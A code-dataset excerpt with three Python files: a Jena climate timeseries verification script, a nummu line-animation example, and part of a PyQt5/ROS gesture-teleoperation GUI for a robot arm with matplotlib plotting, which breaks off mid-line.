pd.read_csv(path)\n\nvals = df.values\ndates = vals[:, 0]\nvals = np.array(vals[:, 1:], dtype='float32')\n\ntemps = np.array(vals[:, 1], dtype='float32')\n\nnum_train = int(len(temps) * .5)\nnum_val = int(len(temps) * .25)\nnum_test = int(len(temps) - num_train - num_val)\n\ndelay = (6 * 120) + (6 * 24) - 6\ndates_delay = dates[delay:]\ntemps_delay = temps[delay:]\n\ndataset_dates = timeseries_dataset_from_array(\n data=dates,\n sampling_rate=6,\n targets=None,\n sequence_length=120)\n\ndataset_temps = timeseries_dataset_from_array(\n data=temps[: -delay],\n targets=temps[delay:],\n sampling_rate=6,\n sequence_length=120)\n\ndataset = timeseries_dataset_from_array(\n data=vals[: -delay],\n targets=temps[delay:],\n sampling_rate=6,\n sequence_length=120,\n batch_size=256,\n start_index=num_train,\n end_index=num_train + num_val)\n\nerr = 0\nsamples = 0\nfor inps, tars in dataset:\n preds = inps[:, -1, 1]\n err += np.sum(np.abs(preds - tars))\n samples += inps.shape[0]\nprint(err / samples)\n\nexit()\nfor inps, tars in dataset_temps:\n print(inps[0])\n print(tars[0])\n print(df.loc[df['Date Time'] == '06.01.2009 23:10:00'])\n print('')\n print(inps[1])\n print(tars[1])\n print(df.loc[df['Date Time'] == '06.01.2009 23:20:00'])\n break\n\nexit()\nfor dates_ in dataset_dates:\n print(np.array(dates_[0]))\n print(dates_delay[0])\n print('')\n print(np.array(dates_[1]))\n print(dates_delay[1])\n break\n\n","repo_name":"nickeisenberg/Kaggle","sub_path":"Jena_Climate/Notebook/timeseries_dataset_from_array_verification.py","file_name":"timeseries_dataset_from_array_verification.py","file_ext":"py","file_size_in_byte":1679,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"23089950581","text":"import numpy as np\nfrom nummu import draw\n\nclass Line:\n\n def __init__(self):\n self.y1 = 0\n self.y2 = 100\n\n def update(self, delta):\n self.y1 += delta\n self.y2 -= delta\n if self.y1 >= 100 or self.y2 <= 0:\n raise StopIteration\n\n def draw(self, pallete):\n x1, y1, x2, y2 = 0, self.y1, 100, self.y2\n color = (255, 255, 255)\n draw.line(pallete, x1, y1, x2, y2, color=color)\n\n\ndef main():\n from nummu import Nummu\n nm = Nummu(100, 100)\n nm.add(Line())\n nm.export('line.gif', delay=4)\n\n\nif __name__ == '__main__':\n main()\n\n\n\n","repo_name":"soasme/nummu","sub_path":"examples/line.py","file_name":"line.py","file_ext":"py","file_size_in_byte":609,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"17785528745","text":"#!/usr/bin/env python3.8\n\"\"\" Launches Interface Application\n - Loads config from include/custom_settings/application.yaml\n\"\"\"\n\nfrom PyQt5.QtWidgets import *\nfrom PyQt5.QtGui import *\nfrom PyQt5.QtCore import *\nimport sys, random, time, csv, yaml, matplotlib\nmatplotlib.use('Qt5Agg')\nfrom matplotlib.backends.backend_qt5agg import FigureCanvasQTAgg\nfrom matplotlib.figure import Figure\nfrom collections import deque\n\nimport settings\nif __name__ == '__main__': settings.init()\nfrom os_and_utils.nnwrapper import NNWrapper\nimport os_and_utils.move_lib as ml\nif __name__ == '__main__': ml.init()\nimport gestures_lib as gl\nif __name__ == '__main__': gl.init()\nimport os_and_utils.scenes as sl\nif __name__ == '__main__': sl.init()\n\nimport numpy as np\nfrom threading import Thread, Timer\nfrom copy import deepcopy\nfrom os.path import expanduser, isfile, isdir\nfrom os_and_utils.transformations import Transformations as tfm\nfrom os_and_utils.utils import point_by_ratio\nfrom os_and_utils.transformations_utils import is_hand_inside_ball\n\ntry:\n from sklearn.metrics import confusion_matrix\nexcept ModuleNotFoundError:\n print(\"[WARNING*] Sklearn library not installed -> confusion_matrix won't be plotted!\")\n\nimport rospy\n# ros msg classes\nfrom geometry_msgs.msg import Quaternion, Pose, Point\nfrom teleop_gesture_toolbox.srv import ChangeNetwork, SaveHandRecord\n\nimport matplotlib\nmatplotlib.use('Qt5Agg')\nmatplotlib.rcParams.update({'font.size': 25})\nfrom PyQt5 import QtCore, QtWidgets\nfrom matplotlib.backends.backend_qt5agg import FigureCanvasQTAgg\nfrom matplotlib.figure import Figure\nimport matplotlib.image as mpimg\n\nclass MplCanvas(FigureCanvasQTAgg):\n ''' Paint with matplotlib on window '''\n def __init__(self, parent=None, width=5, height=8, dpi=100):\n ''' Creates two vertical plots\n '''\n fig = Figure(figsize=(width, height), dpi=dpi)\n self.axes = fig.add_subplot(211)\n self.twinxaxes = self.axes.twinx()\n self.axes2 = fig.add_subplot(212)\n #axes2 = fig.add_subplot(122, xlabel='time [s]', ylabel='Total timewarp distance [mm]')\n super(MplCanvas, self).__init__(fig)\n\nclass AnotherWindowPlot(QWidget):\n\n def __init__(self, *args, **kwargs):\n super(QWidget, self).__init__(*args, **kwargs)\n\n self.canvas = MplCanvas(self, width=5, height=4, dpi=100)\n layout = QVBoxLayout()\n layout.addWidget(self.canvas)\n self.setLayout(layout)\n\n max_len = 50\n self.xdata = deque(maxlen=max_len)\n self.ydata = deque(maxlen=max_len)\n\n self.show()\n\n def set_n_series(self, n_series):\n self.n_series = n_series\n\n def update_plot(self, l_hand_type='static', r_hand_type='dynamic', gs_filter=['grab', 'point', 'two', 'three', 'five', 'swipe_up','swipe_down', 'nothing_dyn'], options='log'):\n ''' Might be little messy when constructing plot data\n Takes data from ml.md and gl.gd\n Parameters:\n l_hand_type (str): 'static', 'dynamic', ''\n r_hand_type (str): 'static', 'dynamic', ''\n gs_filter (str[]): if not empty -> checks if printed gesture string id is in the list\n options (str): - log (function)\n '''\n\n ''' Compose the data\n '''\n left_gs = []\n if l_hand_type:\n left_stamps = [d.header.stamp for d in getattr(gl.gd.l, l_hand_type)[:].copy()]\n left_values = [d.probabilities for d in getattr(gl.gd.l, l_hand_type)[:].copy()]\n left_values_ = []\n gs = getattr(gl.gd, 'Gs_'+l_hand_type)\n left_gs_ids = []\n for n,g in enumerate(gs):\n if g in gs_filter:\n left_gs_ids.append(n)\n left_gs = np.array(getattr(gl.gd,l_hand_type+'_info')().names)[left_gs_ids]\n for value in left_values:\n left_values_.append(np.array(value)[left_gs_ids])\n left_values = left_values_\n right_gs = []\n if r_hand_type:\n right_stamps = [d.header.stamp for d in getattr(gl.gd.r, r_hand_type)[:].copy()]\n right_values = [d.probabilities for d in getattr(gl.gd.r, r_hand_type)[:].copy()]\n right_values_ = []\n gs = getattr(gl.gd, 'Gs_'+r_hand_type)\n right_gs_ids = []\n for n,g in enumerate(gs):\n if g in gs_filter:\n right_gs_ids.append(n)\n right_gs = np.array(getattr(gl.gd,r_hand_type+'_info')().names)[right_gs_ids]\n for value in right_values:\n right_values_.append(np.array(value)[right_gs_ids])\n right_values = right_values_\n # TEMP:\n if 'log' in options:\n right_values = np.array(right_values)\n right_values = (np.log(right_values)-right_values.min())/(right_values.max()-right_values.min())\n\n ''' Creates the list of markers with highest likelihood\n shape=(markers x 2), where marker is [n, id]\n '''\n left_markers = []\n id_last = 999\n for n,values_ in enumerate(left_values):\n id_max = np.argmax(values_)\n if id_max != id_last:\n left_markers.append([n, id_max])\n id_last = id_max\n\n right_markers = []\n id_last = 999\n for n,values_ in enumerate(right_values):\n id_max = np.argmax(values_)\n if id_max != id_last:\n right_markers.append([n, id_max])\n id_last = id_max\n\n ''' Upper plot '''\n self.canvas.axes.cla() # clear the axes content\n self.canvas.twinxaxes.cla()\n self.canvas.axes.plot(left_stamps, left_values,linewidth=7.0)\n self.canvas.twinxaxes.plot(right_stamps, right_values,linewidth=7.0)\n self.canvas.axes.set_xlabel('time [s]')\n self.canvas.axes.set_ylabel(f'Static gestures probability [-]')\n self.canvas.twinxaxes.set_ylabel(f'Dynamic gestures likelihood [-]')\n tmp_gs = []\n if np.array(left_values).any(): tmp_gs.extend(left_gs)\n if np.array(right_values).any(): tmp_gs.extend(right_gs)\n self.canvas.axes.legend(tmp_gs, loc='upper left')\n self.canvas.twinxaxes.legend(right_gs, loc='upper right')\n '''\n for n,id in left_markers:\n np.array(getattr(gl.gd,l_hand_type+'_info')().names)[left_gs_ids][id]\n self.canvas.axes.annotate(left_gs[id], xy=(left_stamps[n], left_values[n][0]), color='black',\n fontsize=\"small\", weight='light',\n horizontalalignment='center',\n verticalalignment='center')\n for n,id in right_markers:\n self.canvas.axes.annotate(right_gs[id], xy=(right_stamps[n], right_values[n][0]), color='black',\n fontsize=\"small\", weight='light',\n horizontalalignment='center',\n verticalalignment='center')\n '''\n '''\n if gs_filter:\n self.canvas.axes.text(0.0, 0.0, \"Only filtered gestures plotted\", color='black',\n fontsize=\"small\", weight='light',\n horizontalalignment='center',\n verticalalignment='top', transform = self.canvas.axes.transAxes)\n '''\n self.canvas.axes.grid(True)\n ''' Bottom plot '''\n #self.canvas.axes2.cla()\n\n # 1\n list_of_actions_hand_inside_ball_left = []\n prev_on = False\n on_stamp = None\n list_of_actions_hand_inside_ball_right = []\n prev_on_right = False\n on_stamp_right = None\n\n # 2\n list_of_actions_hand_visible_left = []\n prev_on_hand_visible = False\n on_stamp_hand_visible = None\n list_of_actions_hand_visible_right = []\n prev_on_hand_visible_right = False\n on_stamp_hand_visible_right = None\n\n lenframes = len(ml.md.frames)\n for n,frm in enumerate(ml.md.frames.copy()):\n # 1 inside ball left\n if is_hand_inside_ball(getattr(frm, 'l')):\n if prev_on == False:\n prev_on = True\n on_stamp = frm.stamp()\n elif n == lenframes-1 and np.array(on_stamp).any():\n list_of_actions_hand_inside_ball_left.append((on_stamp, frm.stamp()-on_stamp))\n else:\n if prev_on == True:\n prev_on = False\n\n list_of_actions_hand_inside_ball_left.append((on_stamp, frm.stamp()-on_stamp))\n\n on_stamp = None\n # 1 inside ball right\n if is_hand_inside_ball(getattr(frm, 'r')):\n if prev_on_right == False:\n prev_on_right = True\n on_stamp_right = frm.stamp()\n elif n == lenframes-1 and np.array(on_stamp_right).any():\n list_of_actions_hand_inside_ball_right.append((on_stamp_right, frm.stamp()-on_stamp_right))\n else:\n if prev_on_right == True:\n prev_on_right = False\n\n list_of_actions_hand_inside_ball_right.append((on_stamp_right, frm.stamp()-on_stamp_right))\n\n on_stamp_right = None\n # 2 visible left\n if getattr(frm, 'l').visible:\n if prev_on_hand_visible == False:\n prev_on_hand_visible = True\n on_stamp_hand_visible = frm.stamp()\n elif n == lenframes-1 and np.array(on_stamp_hand_visible).any():\n list_of_actions_hand_visible_left.append((on_stamp_hand_visible, frm.stamp()-on_stamp_hand_visible))\n else:\n if prev_on_hand_visible == True:\n prev_on_hand_visible = False\n\n list_of_actions_hand_visible_left.append((on_stamp_hand_visible, frm.stamp()-on_stamp_hand_visible))\n\n on_stamp_hand_visible = None\n # 2 visible right\n if getattr(frm, 'r').visible:\n if prev_on_hand_visible_right == False:\n prev_on_hand_visible_right = True\n on_stamp_hand_visible_right = frm.stamp()\n elif n == lenframes-1 and np.array(on_stamp_hand_visible_right).any():\n list_of_actions_hand_visible_right.append((on_stamp_hand_visible_right, frm.stamp()-on_stamp_hand_visible_right))\n else:\n if prev_on_hand_visible_right == True:\n prev_on_hand_visible_right = False\n\n list_of_actions_hand_visible_right.append((on_stamp_hand_visible_right, frm.stamp()-on_stamp_hand_visible_right))\n\n on_stamp_hand_visible_right = None\n\n # 3 activates left\n list_of_actions_activates = []\n list_of_actions_activates_colors = []\n list_of_actions_ids = []\n prev_id_activates = None\n on_stamp_activates = None\n gl_gd_h_t = getattr(getattr(gl.gd, 'l'), l_hand_type)\n lenframes = len(gl_gd_h_t[:])\n\n def id_to_color(id):\n map = {\n 0: 'tab:blue',\n 1: 'tab:orange',\n 2: 'tab:green',\n 3: 'tab:red',\n 4: 'tab:purple',\n 5: 'tab:brown',\n 6: 'tab:pink',\n 7: 'tab:gray',\n 8: 'tab:olive',\n 9: 'tab:cyan'\n }\n return map[id]\n\n list_of_action_activates = []\n for n, frm in enumerate(gl_gd_h_t[:].copy()):\n if not np.isnan(np.array(frm.action_activate_id, dtype=float)).any():\n list_of_action_activates.append(frm.header.stamp)\n\n if not np.isnan(np.array(frm.activate_id, dtype=float)).any():\n if prev_id_activates == None:\n prev_id_activates = frm.activate_id\n on_stamp_activates = frm.header.stamp\n elif n == lenframes-1 and np.array(on_stamp_activates).any():\n list_of_actions_activates.append((on_stamp_activates, frm.header.stamp-on_stamp_activates))\n list_of_actions_activates_colors.append(id_to_color(prev_id_activates))\n list_of_actions_ids.append(prev_id_activates)\n else:\n if prev_id_activates != None:\n list_of_actions_activates.append((on_stamp_activates, frm.header.stamp-on_stamp_activates))\n list_of_actions_activates_colors.append(id_to_color(prev_id_activates))\n list_of_actions_ids.append(prev_id_activates)\n prev_id_activates = None\n on_stamp_activates = None\n\n # 3 activates right\n list_of_actions_activates_right = []\n list_of_actions_activates_colors_right = []\n list_of_actions_ids_right = []\n prev_id_activates = None\n on_stamp_activates = None\n gl_gd_h_t = getattr(getattr(gl.gd, 'r'), r_hand_type)\n lenframes = len(gl_gd_h_t[:])\n\n list_of_action_activates_right = []\n for n, frm in enumerate(gl_gd_h_t[:].copy()):\n if not np.isnan(np.array(frm.action_activate_id, dtype=float)).any():\n list_of_action_activates_right.append(frm.header.stamp)\n\n if not np.isnan(np.array(frm.activate_id, dtype=float)).any():\n if prev_id_activates == None:\n prev_id_activates = frm.activate_id\n on_stamp_activates = frm.header.stamp\n elif n == lenframes-1 and np.array(on_stamp_activates).any():\n list_of_actions_activates_right.append((on_stamp_activates, frm.header.stamp-on_stamp_activates))\n list_of_actions_activates_colors_right.append(id_to_color(prev_id_activates))\n list_of_actions_ids_right.append(prev_id_activates)\n else:\n if prev_id_activates != None:\n list_of_actions_activates_right.append((on_stamp_activates, frm.header.stamp-on_stamp_activates))\n list_of_actions_activates_colors_right.append(id_to_color(prev_id_activates))\n list_of_actions_ids_right.append(prev_id_activates)\n prev_id_activates = None\n on_stamp_activates = None\n\n self.canvas.axes2.plot(left_stamps, [0.0]*len(left_stamps))\n self.canvas.axes2.plot(right_stamps, [0.0]*len(right_stamps))\n\n for id, stamp in zip(list_of_actions_ids, list_of_actions_activates):\n self.canvas.axes2.annotate(np.array(getattr(gl.gd,l_hand_type+'_info')().names)[id], xy=(stamp[0], 6+(id+0.5)/3), color='black',\n fontsize=\"small\", weight='light',\n horizontalalignment='center',\n verticalalignment='center')\n for id, stamp in zip(list_of_actions_ids_right, list_of_actions_activates_right):\n self.canvas.axes2.annotate(np.array(getattr(gl.gd,r_hand_type+'_info')().names)[id], xy=(stamp[0], (id+0.5)/3), color='black',\n fontsize=\"small\", weight='light',\n horizontalalignment='center',\n verticalalignment='center')\n self.canvas.axes2.broken_barh(list_of_actions_hand_visible_left, (10, 2), facecolors='tab:green')\n self.canvas.axes2.broken_barh(list_of_actions_hand_inside_ball_left, (8, 2), facecolors='tab:green')\n self.canvas.axes2.broken_barh(list_of_actions_activates, (6, 2), facecolors=list_of_actions_activates_colors)\n self.canvas.axes2.broken_barh(list_of_actions_hand_visible_right, (4, 2), facecolors='tab:blue')\n self.canvas.axes2.broken_barh(list_of_actions_hand_inside_ball_right, (2, 2), facecolors='tab:blue')\n self.canvas.axes2.broken_barh(list_of_actions_activates_right, (0, 2), facecolors=list_of_actions_activates_colors_right)\n\n self.canvas.axes2.set_ylim(0, 12)\n self.canvas.axes2.set_xlabel('time [s]')\n self.canvas.axes2.set_yticks([1, 3, 5, 7, 9, 11], labels=['R, Activated', 'R, At base', 'R, Visible', 'L, Activated', 'L, At base', 'L, visible'])\n self.canvas.axes2.grid(True)\n\n self.canvas.axes2.vlines(x=list_of_action_activates, ymin=6, ymax=12, color='k')\n self.canvas.axes2.vlines(x=list_of_action_activates_right, ymin=0, ymax=6, color='k')\n\n self.canvas.draw_idle()\n\nclass Example(QMainWindow):\n\n def __init__(self):\n super(Example, self).__init__()\n\n with open(settings.paths.custom_settings_yaml+\"recording.yaml\", 'r') as stream:\n recording_data_loaded = yaml.safe_load(stream)\n with open(settings.paths.custom_settings_yaml+\"application.yaml\", 'r') as stream:\n app_data_loaded = yaml.safe_load(stream)\n global LEFT_MARGIN, RIGHT_MARGIN, BOTTOM_MARGIN, ICON_SIZE, TOP_MARGIN, TOP_MARGIN_GESTURES, BAR_MARGIN\n LEFT_MARGIN = app_data_loaded['LEFT_MARGIN']\n RIGHT_MARGIN = app_data_loaded['RIGHT_MARGIN']\n BOTTOM_MARGIN = app_data_loaded['BOTTOM_MARGIN']\n ICON_SIZE = app_data_loaded['ICON_SIZE']\n TOP_MARGIN = app_data_loaded['TOP_MARGIN']\n TOP_MARGIN_GESTURES = TOP_MARGIN + 80\n BAR_MARGIN = app_data_loaded['BAR_MARGIN']\n\n LeftPanelMaxIterms = app_data_loaded['LeftPanelMaxIterms']\n RightPanelMaxIterms = app_data_loaded['RightPanelMaxIterms']\n\n self.setMinimumSize(QSize(500, 400)) # Minimum window size\n self.lbl1 = QLabel('Left Hand', self)\n self.lbl1.setGeometry(20, 36, 150, 50)\n self.lbl2 = QLabel('Right Hand', self)\n self.lbl2.setGeometry(self.size().width()-140, 36, 100, 50)\n self.lbl3 = QLabel('Gestures', self)\n self.lbl3.setGeometry(20, TOP_MARGIN_GESTURES-30, 150, 50)\n self.lbl4 = QLabel('Gestures', self)\n self.lbl4.setGeometry(self.size().width()-140, TOP_MARGIN_GESTURES-30, 100, 50)\n\n ## View Configuration App\n settings.WindowState = 0\n self.GesturesViewState = False\n self.PlotterWindow = False\n self.MoveViewState = True\n self.OneTimeTurnOnGesturesViewStateOnLeapMotionSignIn = True\n\n ## Cursor Picking (on Configuration page)\n self.pickedSolution = np.zeros(settings.NumConfigBars)\n self.pickedTime = np.zeros(settings.NumConfigBars)\n\n self.lblConfNames = app_data_loaded['ConfigurationPage']['ItemNames']\n self.lblConfValues = ['0.', '0.', '0.', '0.', '0.', '0.', '0.', '0.']\n self.lblConfNamesObj = []\n self.lblConfValuesObj = []\n for i in range(0, settings.NumConfigBars[0]*settings.NumConfigBars[1]):\n self.lblConfNamesObj.append(QLabel(self.lblConfNames[i], self))\n self.lblConfValuesObj.append(QLabel(self.lblConfValues[i], self))\n\n ## Right panel initialization (Observations)\n self.lblRightPanelNamesObj = []\n self.lblRightPanelValuesObj = []\n for i in range(0, RightPanelMaxIterms):\n self.lblRightPanelValuesObj.append(QLabel(\"\", self))\n self.lblRightPanelNamesObj.append(QLabel(\"\", self))\n for i in self.lblRightPanelValuesObj:\n i.setVisible(False)\n\n self.comboPlayNLive = QComboBox(self)\n self.comboPlayNLive.addItem(\"Play path\")\n self.comboPlayNLive.addItem(\"Gesture based\")\n self.comboPlayNLive.activated[str].connect(self.onComboPlayNLiveChanged)\n self.comboPlayNLive.setGeometry(LEFT_MARGIN+130, TOP_MARGIN-10,ICON_SIZE*2,int(ICON_SIZE/2))\n\n self.comboPickPlayTraj = QComboBox(self)\n for path in sl.paths:\n self.comboPickPlayTraj.addItem(path.name)\n self.comboPickPlayTraj.activated[str].connect(self.onComboPickPlayTrajChanged)\n self.comboPickPlayTraj.setGeometry(LEFT_MARGIN+130+ICON_SIZE*2, TOP_MARGIN-10,ICON_SIZE*2,int(ICON_SIZE/2))\n\n self.comboLiveMode = QComboBox(self)\n self.comboLiveMode.addItem(\"Default\")\n self.comboLiveMode.addItem(\"With eef rot\")\n self.comboLiveMode.addItem(\"Separate eef rot\")\n\n self.comboLiveMode.activated[str].connect(self.onComboLiveModeChanged)\n self.comboLiveMode.setGeometry(LEFT_MARGIN+130+ICON_SIZE*2, TOP_MARGIN-10,ICON_SIZE*2,int(ICON_SIZE/2))\n ## Control of the movement exectution\n self.btnPlayMove = QPushButton('Forward', self)\n self.btnPlayMove.clicked.connect(self.button_play_move)\n self.btnPlayMove.setGeometry(LEFT_MARGIN+130+ICON_SIZE*4, TOP_MARGIN-10,ICON_SIZE,int(ICON_SIZE/2))\n self.btnPlayMove2 = QPushButton('Backward', self)\n self.btnPlayMove2.clicked.connect(self.button_play_move2)\n self.btnPlayMove2.setGeometry(LEFT_MARGIN+130+ICON_SIZE*5, TOP_MARGIN-10,ICON_SIZE,int(ICON_SIZE/2))\n self.btnPlayMove3 = QPushButton('Stop', self)\n self.btnPlayMove3.clicked.connect(self.button_play_move3)\n self.btnPlayMove3.setGeometry(LEFT_MARGIN+130+ICON_SIZE*6, TOP_MARGIN-10,ICON_SIZE,int(ICON_SIZE/2))\n\n self.recording = False # Bool if recording is happening\n self.REC_TIME = recording_data_loaded['Length'] # [s]\n self.dir_queue = []\n\n self.lblStatus = QLabel('Status bar', self)\n self.lblStatus.setGeometry(LEFT_MARGIN+130, TOP_MARGIN+32, 200, 100)\n\n self.comboInteractiveSceneChanges = QComboBox(self)\n self.comboInteractiveSceneChanges.addItem(\"Scene 1 Drawer\")\n self.comboInteractiveSceneChanges.addItem(\"Scene 2 Pick/Place\")\n self.comboInteractiveSceneChanges.addItem(\"Scene 3 Push button\")\n self.comboInteractiveSceneChanges.addItem(\"Scene 4 - 2 Pick/Place\")\n self.comboInteractiveSceneChanges.activated[str].connect(self.onInteractiveSceneChanged)\n self.comboInteractiveSceneChanges.setGeometry(LEFT_MARGIN+130+ICON_SIZE*4, TOP_MARGIN-10,ICON_SIZE*2,int(ICON_SIZE/2))\n\n # Bottom\n self.btnRecordActivate = QPushButton('Keyboard recording', self)\n self.btnRecordActivate.clicked.connect(self.record_with_keys)\n self.btnRecordActivate.setGeometry(LEFT_MARGIN+130, TOP_MARGIN+30,ICON_SIZE*2,int(ICON_SIZE/2))\n\n self.btnPlotActivate = QPushButton('Update plot', self)\n self.btnPlotActivate.clicked.connect(self.update_plot_with_vars)\n self.btnPlotActivate.setGeometry(LEFT_MARGIN+130+int(ICON_SIZE*4), TOP_MARGIN+30,ICON_SIZE*2,int(ICON_SIZE/2))\n\n self.btnExportDataActivate = QPushButton('Export data', self)\n self.btnExportDataActivate.clicked.connect(self.export_plot_data)\n self.btnExportDataActivate.setGeometry(LEFT_MARGIN+130+int(ICON_SIZE*2), TOP_MARGIN+30,ICON_SIZE*2,int(ICON_SIZE/2))\n\n self.btnDeletePlotActivate = QPushButton('Delete data', self)\n self.btnDeletePlotActivate.clicked.connect(self.delete_plot_data)\n self.btnDeletePlotActivate.setGeometry(LEFT_MARGIN+130+int(ICON_SIZE*6), TOP_MARGIN+30,ICON_SIZE*2,int(ICON_SIZE/2))\n\n # Move Page\n lbls = ['Pos. X:', 'Pos. Y:', 'Pos. Z:', 'Ori. X:', 'Ori. Y:', 'Ori. Z:', 'Ori. W:', 'Gripper:']\n lblsVals = ['0.0', '0.0', '1.0', '0.0', '0.0', '0.0', '1.0', '0.0']\n self.movePageGoPoseLabels = []\n self.movePageGoPoseEdits = []\n for i in range(0,7):\n self.movePageGoPoseLabels.append(QLabel(self))\n self.movePageGoPoseLabels[-1].setText(lbls[i])\n self.movePageGoPoseLabels[-1].move(LEFT_MARGIN+20, TOP_MARGIN+i*32)\n self.movePageGoPoseEdits.append(QLineEdit(self))\n self.movePageGoPoseEdits[-1].move(LEFT_MARGIN+80, TOP_MARGIN+i*32)\n self.movePageGoPoseEdits[-1].resize(200, 32)\n self.movePageGoPoseEdits[-1].setText(lblsVals[i])\n self.movePageGoPoseButton = QPushButton(\"Go To Pose\", self)\n self.movePageGoPoseButton.clicked.connect(self.go_to_pose_button)\n self.movePageGoPoseButton.move(LEFT_MARGIN+80, TOP_MARGIN+7*32)\n ''' Gripper control '''\n i = 7\n self.movePageGoPoseLabels.append(QLabel(self))\n self.movePageGoPoseLabels[-1].setText(lbls[i])\n self.movePageGoPoseLabels[-1].move(LEFT_MARGIN+20, TOP_MARGIN+(i+1)*32)\n self.movePageGoPoseEdits.append(QLineEdit(self))\n self.movePageGoPoseEdits[-1].move(LEFT_MARGIN+80, TOP_MARGIN+(i+1)*32)\n self.movePageGoPoseEdits[-1].resize(200, 32)\n self.movePageGoPoseEdits[-1].setText(lblsVals[i])\n self.movePageGoGripperButton = QPushButton(\"Actuate gripper\", self)\n self.movePageGoGripperButton.clicked.connect(self.actuate_gripper_button)\n self.movePageGoGripperButton.move(LEFT_MARGIN+80, TOP_MARGIN+9*32)\n\n self.movePageOpenGripperButton = QPushButton(\"Open gripper\", self)\n self.movePageOpenGripperButton.clicked.connect(self.open_gripper_button)\n self.movePageOpenGripperButton.move(LEFT_MARGIN+80, TOP_MARGIN+10*32)\n self.movePageCloseGripperButton = QPushButton(\"Close gripper\", self)\n self.movePageCloseGripperButton.clicked.connect(self.close_gripper_button)\n self.movePageCloseGripperButton.move(LEFT_MARGIN+80+100, TOP_MARGIN+10*32)\n\n self.movePageRobotResetButton = QPushButton(\"Robot reset\", self)\n self.movePageRobotResetButton.clicked.connect(self.robot_reset_button)\n self.movePageRobotResetButton.move(LEFT_MARGIN+80, TOP_MARGIN+11*32)\n\n\n\n self.movePageUseEnvAboveButton = QPushButton('Above env.', self)\n self.movePageUseEnvAboveButton.clicked.connect(self.movePageUseEnvAboveButtonFun)\n self.movePageUseEnvAboveButton.setGeometry(LEFT_MARGIN+300, TOP_MARGIN+100,ICON_SIZE*2,int(ICON_SIZE/2))\n self.movePageUseEnvWallButton = QPushButton('Wall env.', self)\n self.movePageUseEnvWallButton.clicked.connect(self.movePageUseEnvWallButtonFun)\n self.movePageUseEnvWallButton.setGeometry(LEFT_MARGIN+300, TOP_MARGIN+140,ICON_SIZE*2,int(ICON_SIZE/2))\n self.movePageUseEnvTableButton = QPushButton('Table env.', self)\n self.movePageUseEnvTableButton.clicked.connect(self.movePageUseEnvTableButtonFun)\n self.movePageUseEnvTableButton.setGeometry(LEFT_MARGIN+300, TOP_MARGIN+180,ICON_SIZE*2,int(ICON_SIZE/2))\n self.movePagePoseNowButton = QPushButton('Set current pose', self)\n self.movePagePoseNowButton.clicked.connect(self.movePagePoseNowButtonFun)\n self.movePagePoseNowButton.setGeometry(LEFT_MARGIN+300, TOP_MARGIN+20,ICON_SIZE*2,int(ICON_SIZE/2))\n\n self.timer = QBasicTimer()\n self.timer.start(100, self)\n self.step = 0\n\n self.play_status = 0\n\n menubar = self.menuBar()\n viewMenu = menubar.addMenu('View')\n pageMenu = menubar.addMenu('Page')\n configMenu = menubar.addMenu('Robot config.')\n sceneMenu = menubar.addMenu('Scene')\n testingMenu = menubar.addMenu('Testing')\n leapmotionMenu = menubar.addMenu('Gestures')\n\n ## Menu items -> View options\n viewOptionsAction = QAction('View gestures data', self, checkable=True)\n viewOptionsAction.setStatusTip('View gestures data')\n viewOptionsAction.setChecked(False)\n viewOptionsAction.triggered.connect(self.toggleViewGesturesMenu)\n viewMoveOptionsAction = QAction('View move data', self, checkable=True)\n viewMoveOptionsAction.setStatusTip('View move data')\n viewMoveOptionsAction.setChecked(True)\n viewMoveOptionsAction.triggered.connect(self.toggleViewMoveMenu)\n viewPlotWindowAction = QAction('View plot window', self, checkable=True)\n viewPlotWindowAction.setStatusTip('View plot window')\n viewPlotWindowAction.setChecked(False)\n viewPlotWindowAction.triggered.connect(self.togglePlotWindow)\n\n\n ## Menu items -> Go to page\n viewGoToInfoAction = QAction('Info page', self)\n viewGoToInfoAction.setStatusTip('Info page')\n viewGoToInfoAction.triggered.connect(self.goToInfo)\n viewGoToControlAction = QAction('Control page', self)\n viewGoToControlAction.setStatusTip('Control page (beta)')\n viewGoToControlAction.triggered.connect(self.goToConfig)\n viewGoToMoveAction = QAction('Move page', self)\n viewGoToMoveAction.setStatusTip('Move page')\n viewGoToMoveAction.triggered.connect(self.goToMove)\n\n # The environment\n impMenu = QMenu('Environment', self)\n switchEnvAboveAct = QAction('Above', self)\n switchEnvAboveAct.triggered.connect(self.switchEnvAbove)\n switchEnvWallAct = QAction('Wall', self)\n switchEnvWallAct.triggered.connect(self.switchEnvWall)\n switchEnvTableAct = QAction('Table', self)\n switchEnvTableAct.triggered.connect(self.switchEnvTable)\n impMenu.addAction(switchEnvAboveAct)\n impMenu.addAction(switchEnvWallAct)\n impMenu.addAction(switchEnvTableAct)\n impMenu2 = QMenu('Orientation', self)\n fixedOriAct = QAction('Fixed (default as chosen env.)', self, checkable=True)\n fixedOriAct.triggered.connect(self.fixedOriAct)\n impMenu2.addAction(fixedOriAct)\n print_path_trace_action = QAction('Print path trace', self, checkable=True)\n print_path_trace_action.triggered.connect(self.print_path_trace)\n print_path_trace_action.checked = False\n\n record_with_keys_action = QAction('Record train data with keyboard keys', self, checkable=True)\n record_with_keys_action.triggered.connect(self.record_with_keys)\n download_networks_action = QAction('Download networks from gdrive', self)\n download_networks_action.triggered.connect(self.download_networks_gdrive)\n self.network_menu = QMenu('Pick detection network', self)\n self.networks = gl.gd.get_networks()\n self.network_actions = []\n for index,network in enumerate(self.networks):\n action = QAction(network, self)\n action.triggered.connect(\n lambda checked, network=network: self.changeNetwork(network))\n self.network_actions.append(action)\n self.network_menu.addAction(action)\n self.lblInfo = QLabel(\"\", self)\n self.confusion_mat_action = QAction('Test gestures', self)\n self.confusion_mat_action.setToolTip('Plus Generate Confusion matrix')\n self.confusion_mat_action.triggered.connect(self.confustion_mat)\n\n\n SCENES = sl.scenes.names()\n for index, SCENE in enumerate(SCENES):\n action = QAction('Scene '+str(index)+' '+SCENE, self)\n action.triggered.connect(\n lambda checked, index=index: self.goScene(index))\n sceneMenu.addAction(action)\n\n initTestAction = QAction('Initialization test', self)\n initTestAction.triggered.connect(self.thread_testInit)\n tableTestAction = QAction('Table test', self)\n tableTestAction.triggered.connect(self.thread_testMovements)\n inputTestAction = QAction('Test by input', self)\n inputTestAction.triggered.connect(self.thread_testMovementsInput)\n inputPlotJointsAction = QAction('Plot joints path now', self)\n inputPlotJointsAction.triggered.connect(self.thread_inputPlotJointsAction)\n inputPlotPosesAction = QAction('Plot poses path now', self)\n 